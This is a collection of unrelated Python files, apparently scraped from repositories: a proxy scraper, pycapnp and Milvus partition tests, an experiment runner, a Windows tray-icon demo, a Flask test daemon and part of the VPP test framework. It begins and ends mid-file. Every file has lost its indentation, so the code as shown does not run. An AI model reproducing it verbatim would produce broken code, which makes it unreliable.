return
if self.is_ipv4(exit_node):
self.proxies[proto][proxy] = exit_node
def get_all_sources(self) -> None:
"""Get proxies from sources."""
logger.info("Getting sources")
threads = [
Thread(target=self.get_source, args=(source, proto))
for proto, sources in self.sources.items()
for source in sources
]
self.start_threads(threads)
def check_all_proxies(self) -> None:
for proto, proxies in self.proxies.items():
logger.info("Checking {0} {1} proxies", len(proxies), proto)
threads = [
Thread(target=self.check_proxy, args=(proxy, proto))
for proto, proxies in self.proxies.items()
for proxy in proxies
]
self.start_threads(threads)
@staticmethod
def _get_sorting_key(x: Tuple[str, Optional[str]]) -> Tuple[int, ...]:
octets = x[0].replace(":", ".").split(".")
return tuple(map(int, octets))
def sort_proxies(self) -> None:
"""Delete invalid proxies and sort working ones."""
prox = [
(
proto,
[
(proxy, exit_node)
for proxy, exit_node in proxies.items()
if exit_node
],
)
for proto, proxies in self.proxies.items()
]
self.proxies = {
proto: dict(sorted(proxies, key=self._get_sorting_key))
for proto, proxies in prox
}
def save_proxies(self) -> None:
"""Delete old proxies and save new ones."""
directories = [
"proxies",
"proxies_anonymous",
"proxies_geolocation",
"proxies_geolocation_anonymous",
]
for directory in directories:
try:
rmtree(directory)
except FileNotFoundError:
pass
if not self.MMDB:
directories = ["proxies", "proxies_anonymous"]
for directory in directories:
mkdir(directory)
self.sort_proxies()
for proto, proxies in self.proxies.items():
for proxy, exit_node in proxies.items():
self.append_to_file(f"proxies/{proto}.txt", proxy)
if exit_node != proxy.split(":")[0]:
self.append_to_file(
f"proxies_anonymous/{proto}.txt", proxy
)
if self.MMDB:
with open_database(self.MMDB) as reader:
for proto, proxies in self.proxies.items():
for proxy, exit_node in proxies.items():
line = proxy + self.get_geolocation(exit_node, reader) # type: ignore
self.append_to_file(
f"proxies_geolocation/{proto}.txt", line
)
if exit_node != proxy.split(":")[0]:
self.append_to_file(
f"proxies_geolocation_anonymous/{proto}.txt",
line,
)
def main(self) -> None:
self.get_all_sources()
self.check_all_proxies()
self.save_proxies()
logger.success("Result:")
for proto, proxies in self.proxies.items():
logger.success("{0} - {1}", proto, len(proxies))
def main() -> None:
logger.remove()
logger.add(
stderr,
format="<green>{time:YYYY-MM-DD HH:mm:ss}</green> | <level>{message}</level>",
colorize=True,
)
proxy_scraper_checker = ProxyScraperChecker(
timeout=config.TIMEOUT,
geolite2_city_mmdb="GeoLite2-City.mmdb"
if config.GEOLOCATION
else None,
ip_service=config.IP_SERVICE,
http_sources=config.HTTP_SOURCES if config.HTTP else None,
socks4_sources=config.SOCKS4_SOURCES if config.SOCKS4 else None,
socks5_sources=config.SOCKS5_SOURCES if config.SOCKS5 else None,
)
proxy_scraper_checker.main()
logger.success("Thank you for using proxy-scraper-checker :)")
if __name__ == "__main__":
main()
|
test_threads.py
|
import capnp
import pytest
import test_capability_capnp
import socket
import threading
import platform
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_making_event_loop():
capnp.remove_event_loop(True)
capnp.create_event_loop()
capnp.remove_event_loop()
capnp.create_event_loop()
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_making_threaded_event_loop():
capnp.remove_event_loop(True)
capnp.create_event_loop(True)
capnp.remove_event_loop()
capnp.create_event_loop(True)
class Server(test_capability_capnp.TestInterface.Server):
def __init__(self, val=1):
self.val = val
def foo(self, i, j, **kwargs):
return str(i * 5 + self.val)
class SimpleRestorer(test_capability_capnp.TestSturdyRefObjectId.Restorer):
def restore(self, ref_id):
assert ref_id.tag == 'testInterface'
return Server(100)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_using_threads():
capnp.remove_event_loop(True)
capnp.create_event_loop(True)
read, write = socket.socketpair(socket.AF_UNIX)
def run_server():
restorer = SimpleRestorer()
server = capnp.TwoPartyServer(write, restorer)
capnp.wait_forever()
server_thread = threading.Thread(target=run_server)
server_thread.daemon = True
server_thread.start()
client = capnp.TwoPartyClient(read)
ref = test_capability_capnp.TestSturdyRefObjectId.new_message(tag='testInterface')
cap = client.restore(ref)
cap = cap.cast_as(test_capability_capnp.TestInterface)
remote = cap.foo(i=5)
response = remote.wait()
assert response.x == '125'
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils import *
from constants import *
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_name_name_None(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_different_partition_names(self, connect, collection):
'''
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
'''
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities)
assert len(insert_ids) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(insert_ids) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(insert_ids) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_insert_ids) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.level(2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
ids_new = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(ids_new) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.level(2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.level(2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.level(2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
simple.py
|
import multiprocessing as mp
import traceback
import sys
import os
import math
from ..util import get_logger, mkfile
from ..result import write_result
def queue_to_list(q):
l = []
while q.qsize() != 0:
l.append(q.get())
return l
def generate_instances(experiment):
instances = []
for problem in experiment.problems:
instances.extend(problem.generate_instances(experiment))
return instances
class SimpleRunner:
def __init__(self, num_threads=None):
if num_threads == None:
num_threads = math.ceil(mp.cpu_count() / 2.0)
self.num_threads = num_threads
def run(self, experiment):
instances = generate_instances(experiment)
logger = get_logger()
# TODO (Brad): We could probably re-use instances here. Before we had to start new processes because of Popper
# re-using pyswip instances. However, as long as all systems are run as subcommands, this is not a problem.
ctx = mp.get_context('spawn')
with ctx.Manager() as manager:
sema = manager.BoundedSemaphore(self.num_threads)
results_q = manager.Queue()
all_processes = []
unhandled_processes = []
for instance in instances:
sema.acquire()
# This is an absurd hack to handle processes that seg fault without releasing the semaphore.
new_unhandled_processes = []
for process in unhandled_processes:
if process.exitcode == None:
new_unhandled_processes.append(process)
elif process.exitcode < 0: # For some reason I was getting -6 instead of SIGSEGV -11
logger.debug(f"{process.name} CRASHED. RELEASING")
sema.release()
unhandled_processes = new_unhandled_processes
p = ctx.Process(target=self.run_instance, args=(experiment.output_path, instance, sema, results_q), name=instance.name)
all_processes.append(p)
unhandled_processes.append(p)
p.start()
# TODO(Brad): Handle timing out each process?
for p in all_processes:
p.join()
result_list = queue_to_list(results_q)
for result in result_list:
logger.info(result)
results_file = os.path.abspath(mkfile(experiment.output_path, "results.json"))
write_result(results_file, result_list)
logger.info(f"Results for {len(result_list)} instances written to {results_file}")
def run_instance(self, output_path, instance, sema, results_q):
logger = get_logger()
logger.info(f'\nRunning {instance.name}')
try:
result = instance.run()
except Exception as e:
logger.info(f"Exception in instance {instance.name}")
logger.info(traceback.format_exc())
logger.error("Unexpected error:", sys.exc_info()[0])
raise e
logger.info(f'{instance.name} completed in {result.total_exec_time:0.3f}s')
# Save results to a file.
write_result(mkfile(instance.output_dir(output_path), "results.json"), result)
results_q.put(result, block=True)
sema.release()
return result
|
demo.py
|
# -*- coding: UTF-8 -*-
"""
@Project :pywin10
@File :demo.py
@Author :Gao yongxian
@Date :2021/11/30 13:03
@contact: g1695698547@163.com
"""
import threading
import tkinter
import win32gui
from pywin10 import TaskBarIcon
class MainWindow:
def __init__(self):
self.root = tkinter.Tk()
# 开启常驻后台线程
backend_thread = threading.Thread(target=self.backend)
backend_thread.setDaemon(True)
backend_thread.start()
# 设置当点击窗体时弹出通知
self.root.bind('<ButtonPress-1>', self._on_tap)
# 自定义关闭按钮
self.root.protocol("WM_DELETE_WINDOW", self._close)
self.root.mainloop()
def _on_tap(self, event):
self.t.ShowToast()
def _close(self):
self.t.ShowToast(title="最小化", msg="窗口已经最小化到图标")
self.root.withdraw()
def _show(self):
self.root.deiconify()
def ding(self, *args):
print("ding 接收参数:", args)
def _left_click(self, *args):
print("_left_click 接收参数:", args)
def exit(self):
# 退出 TaskBarIcon
win32gui.DestroyWindow(self.t.hwnd)
# 退出 Tkinter
self.root.destroy()
def backend(self):
# TaskBarIcon 里面的参数全部都不是必须的,即便self.t = TaskBarIcon(),你一样可以发送通知等.
self.t = TaskBarIcon(
left_click=(self._left_click, (1, 2)), # 左键单击回调函数,可以不设置(如果想要传参,这样写(func,(arg1,arg2)))
double_click=self._show, # 左键双击回调函数,可以不设置(如果不想传参,直接写函数名称)
icon="python.ico", # 设置图标,可以不设置
hover_text="TaskBarIcon", # 设置悬浮在小图标显示的文字,可以不设置
menu_options=[ # 可以不设置
['退出', "退出.ico", self.exit, 1], # 菜单项格式:["菜单项名称","菜单项图标路径或None",回调函数或者子菜单列表,id数字(随便写不要重复即可)]
["分隔符", None, None, 111],
['顶一顶', "ding.ico", (self.ding, (1, 2, 3)), 44],
['日历', "日历.ico", None, 3],
['主页', "主页.ico", self._show, 2],
["分隔符", None, None, 7],
["更多选项", "编辑.ico", [
['使用说明', "等待文件.ico", None, 25],
["分隔符", None, None, 17],
['hello', "github.ico", None, 16],
['hello2', "github.ico", None, 1116],
], 4],
],
menu_style="iconic", # 设置右键菜单的模式,可以不设置:normal(不展示图标),iconic(展示图标)
icon_x_pad=12, # 设置图标左边距
)
# 注意这是死循环,类似与tkinter中的mainloop,
# 因为都是死循环,所以与mainloop会冲突,放到线程里面执行.
win32gui.PumpMessages()
if __name__ == '__main__':
MainWindow()
|
daemon.py
|
from uuid import uuid4
from flask import Flask, request
import threading
import requests
import time
from contextlib import contextmanager
import sys
methods = ["GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE"]
class Daemon:
def __init__(self, app: Flask):
self._app = app
self.uuid = str(uuid4())
# Create a unique endpoint for shutting down the server.
# Uses uuid so there are no collisions with already defined endpoints.
@self._app.route(f'/{self.uuid}', endpoint=self.uuid)
def shutdown():
print("Shutting app down")
func = request.environ.get('werkzeug.server.shutdown')
func()
return "stopping"
self.thread = None
self.stdout = self.get_stdout()
def stop(self):
requests.get(f"http://127.0.0.1:5000/{self.uuid}")
self.stdout.__exit__(None, None, None, )
def start(self):
self.thread = threading.Thread(target=self._app.run, )
self.stdout.__enter__()
self.thread.start()
time.sleep(1)
def __getattr__(self, key):
class Endpoint:
def __init__(self, string):
self.string = string
print(string)
def __getattr__(self, method):
if method in methods:
def call(**kwargs):
response = requests.request(method, f"http://127.0.0.1:5000/{self.string}", **kwargs)
return response
return call
else:
return Endpoint(f"{self.string}/{method}")
return Endpoint(key)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
@contextmanager
def get_stdout(self):
class MyStream:
def __init__(self, parent):
self.old_stdout = sys.stdout
self.parent = parent
def write(self, msg):
ident = threading.currentThread().ident
if self.parent.thread:
censored = [self.parent.thread.ident]
else:
censored = []
if ident not in censored:
if threading.main_thread().ident != ident:
prefix = f'[Daemon] ' if msg.strip() else ''
else:
prefix = f'[Main] ' if msg.strip() else ''
self.old_stdout.write(prefix + msg)
def flush(self):
self.old_stdout.flush()
sys.stdout = MyStream(self)
try:
yield
finally:
sys.stdout = sys.stdout.old_stdout
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import re
import time
import faulthandler
import random
import copy
import platform
import shutil
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
from abc import ABC, abstractmethod
from struct import pack, unpack
import scapy.compat
from scapy.packet import Raw, Packet
from config import config, available_cpus, num_cpus, max_vpp_cpus
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi import VppEnum
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
SKIP_CPU_SHORTAGE = 5
if config.debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not config.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not config.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, config.vpp, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
# marks the suites broken when ASan is enabled
FIXME_ASAN = 3
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
tag_fixme_asan = create_tag_decorator(TestCaseTag.FIXME_ASAN)
class DummyVpp:
returncode = None
pid = 0xcafebafe
def poll(self):
pass
def terminate(self):
pass
class CPUInterface(ABC):
cpus = []
skipped_due_to_cpu_lack = False
@classmethod
@abstractmethod
def get_cpus_required(cls):
pass
@classmethod
def assign_cpus(cls, cpus):
cls.cpus = cpus
class VppTestCase(CPUInterface, unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_statseg_config = ""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
remove_configured_vpp_objects_on_tear_down = True
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
